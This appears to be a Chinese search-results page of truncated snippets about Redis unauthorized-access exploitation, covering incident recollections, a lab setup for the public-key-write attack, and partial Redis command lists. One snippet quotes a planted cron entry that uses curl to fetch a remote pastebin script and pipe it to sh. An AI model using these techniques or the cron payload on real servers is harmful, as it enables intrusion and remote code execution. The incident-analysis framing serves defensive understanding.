昨天阿里云拦截到了一次异常登陆，改了密码后就没有管他， 今天阿里云给我发消息说我的服务器可能被黑客利用，存在恶意发包行为。。。。。。。 不过我不打算只是单纯的重置系统，经过一系列的查找原因后，发现被攻击的原因是我的redis没有设置登陆密码（redis 默认情况下，没有配置登陆密码，任意用户 ...

先复现一篇公钥写入的利用方式，以便明天使用，后续补上其他利用方式。 一、环境准备 　　1.靶机环境 CenOS 7 64 redis-2.8.12 　　192.168.0.111 　　2.攻击机 kail　　64 redis-2.8.12 　　　 　　环境安装有几个坑 ...

Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下，利用 Redis 自身的 ...

以前的笔记 简介 redis是一个key-value存储系统。和Memcached类似，它支持存储的value类型相对更多，包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash（哈希类型）。这些数据类型都支持 ...

目录 Redis未授权漏洞 引言 Redis是什么 Redis的应用场景有哪些？ Redis的数据类型及主要特性 String类型 ...

情况复述：Linux+redis+python，通过python代码向redis中写入数据，前几周都能正常运行，今天突然不行了。因为需要从线下取数，进行爬取操作，急需解决。 1.测试线下代码插入redis是否成功，取数是否成功 2.查看线上是否只有一个redis数据库，是否有多个开放端口，密码 ...

起因 偶然间发现redis里有一个陌生key：tightsoft，它的值是：*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道这肯定不是我们存的，再看value我警觉了，这是要定时执行脚本啊。 分析 ...

前提： 　　1.靶机是Centos环境 　　2.redis低版本，具体低于多少不清楚 ——————主要几个命令操作—————— 　　flushall 　　　　　　　　　　　　//清空所有key值　　config get dir 　　　　 　　　　//获取路径　　config set ...